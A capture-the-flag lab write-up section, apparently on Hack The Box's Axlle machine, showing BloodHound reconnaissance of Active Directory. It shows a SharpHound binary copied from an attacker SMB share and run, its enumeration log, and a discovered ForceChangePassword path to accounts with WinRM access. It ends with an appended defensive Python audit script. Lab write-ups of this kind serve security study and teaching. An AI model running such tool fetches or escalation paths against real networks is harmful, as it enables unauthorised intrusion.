BloodHound
BloodHound is a powerful tool used by adversaries to visualize and analyze Active Directory relationships, allowing them to quickly identify and exploit potential attack paths and privilege escalation opportunities within a network. It automates the reconnaissance phase of an attack, helping attackers pinpoint weak points and ultimately compromise Active Directory environments.
Ingestion
PS C:\Users\gideon.hamill\Desktop> copy \\10.10.14.110\smb\SharpHound.exe
PS C:\Users\gideon.hamill\Desktop> .\SharpHound.exe -c All
2024-06-27T10:28:48.6631925-07:00|INFORMATION|This version of SharpHound is compatible with the 4.2 Release of BloodHound
2024-06-27T10:28:48.8194579-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-06-27T10:28:48.8507126-07:00|INFORMATION|Initializing SharpHound at 10:28 AM on 6/27/2024
2024-06-27T10:28:49.0226127-07:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-06-27T10:28:49.1788222-07:00|INFORMATION|Beginning LDAP search for axlle.htb
2024-06-27T10:28:49.2256937-07:00|INFORMATION|Producer has finished, closing LDAP channel
2024-06-27T10:28:49.2256937-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2024-06-27T10:29:19.4132303-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 36 MB RAM
2024-06-27T10:29:35.2569515-07:00|INFORMATION|Consumers finished, closing output channel
Closing writers
2024-06-27T10:29:35.2882460-07:00|INFORMATION|Output channel closed, waiting for output task to complete
2024-06-27T10:29:35.3819444-07:00|INFORMATION|Status: 113 objects finished (+113 2.456522)/s -- Using 44 MB RAM
2024-06-27T10:29:35.3819444-07:00|INFORMATION|Enumeration finished in 00:00:46.2057541
2024-06-27T10:29:35.4444480-07:00|INFORMATION|Saving cache with stats: 72 ID to type mappings.
74 name to SID mappings.
0 machine sid mappings.
2 sid to domain mappings.
0 global catalog mappings.
2024-06-27T10:29:35.4600826-07:00|INFORMATION|SharpHound Enumeration Completed at 10:29 AM on 6/27/2024! Happy Graphing!
There already is an existing PowerShell session as the gideon.hamill user, so I'll be using SharpHound.
Ingestion complete with SharpHound.exe
┌──(kali㉿kali)-[~/…/htb/labs/axlle/bloodhound]
└─$ sudo neo4j console
Directories in use:
home: /usr/share/neo4j
config: /usr/share/neo4j/conf
logs: /usr/share/neo4j/logs
plugins: /usr/share/neo4j/plugins
import: /usr/share/neo4j/import
data: /usr/share/neo4j/data
certificates: /usr/share/neo4j/certificates
licenses: /usr/share/neo4j/licenses
run: /usr/share/neo4j/run
Starting Neo4j.
┌──(kali㉿kali)-[~/…/htb/labs/axlle/bloodhound]
└─$ bloodhound
Firing up neo4j and bloodhound
Uploading ingested domain data
dallon.matrix
The dallon.matrix user has transitive ForceChangePassword access to both the baz.humphries and jacob.greeny users through its membership in the Web Devs group.
jacob.greeny
The jacob.greeny user is a member of the Remote Management Users group, which grants the user WinRM access to the target system.
baz.humphries
The baz.humphries user is a member of the Remote Management Users group, which grants the user WinRM access to the target system.
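The transitive edges described above (a ForceChangePassword right inherited through Web Devs membership, and WinRM access inherited through Remote Management Users) are what the graph query resolves. The following is an added audit example, not SharpHound or BloodHound code; it walks nested MemberOf edges over a constructed edge list that mirrors this write-up, and reports users who can reset the password of an account that also holds remote access. The host name "TARGET-HOST" is a placeholder, since the page does not name the machine.

```python
# Constructed edge list modelled on the write-up's findings; not real SharpHound output.
# Each edge is (source, relation, target). "TARGET-HOST" is a placeholder host name.
EDGES = [
    ("dallon.matrix", "MemberOf", "Web Devs"),
    ("Web Devs", "ForceChangePassword", "baz.humphries"),
    ("Web Devs", "ForceChangePassword", "jacob.greeny"),
    ("baz.humphries", "MemberOf", "Remote Management Users"),
    ("jacob.greeny", "MemberOf", "Remote Management Users"),
    ("Remote Management Users", "CanPSRemote", "TARGET-HOST"),
]


def groups_of(principal, edges):
    """Every group the principal belongs to, following nested MemberOf edges."""
    seen, stack = set(), [principal]
    while stack:
        node = stack.pop()
        for src, rel, dst in edges:
            if src == node and rel == "MemberOf" and dst not in seen:
                seen.add(dst)
                stack.append(dst)
    return seen


def effective_rights(principal, relation, edges):
    """Targets reachable via `relation`, held directly or through any nested group."""
    holders = {principal} | groups_of(principal, edges)
    return {dst for src, rel, dst in edges if rel == relation and src in holders}


def audit(edges):
    """Map each user to accounts it can force-reset that also have CanPSRemote access.

    A non-empty result is the finding a defender wants: a password-reset right that
    turns into interactive access on a host, and should be reviewed or removed.
    """
    groups = {dst for _, rel, dst in edges if rel == "MemberOf"}
    users = {src for src, rel, _ in edges if rel == "MemberOf"} - groups
    findings = {}
    for user in sorted(users):
        targets = effective_rights(user, "ForceChangePassword", edges)
        risky = {t for t in targets if effective_rights(t, "CanPSRemote", edges)}
        if risky:
            findings[user] = sorted(risky)
    return findings


if __name__ == "__main__":
    for user, targets in audit(EDGES).items():
        print(f"{user} can reset {', '.join(targets)} (remote-access accounts)")
```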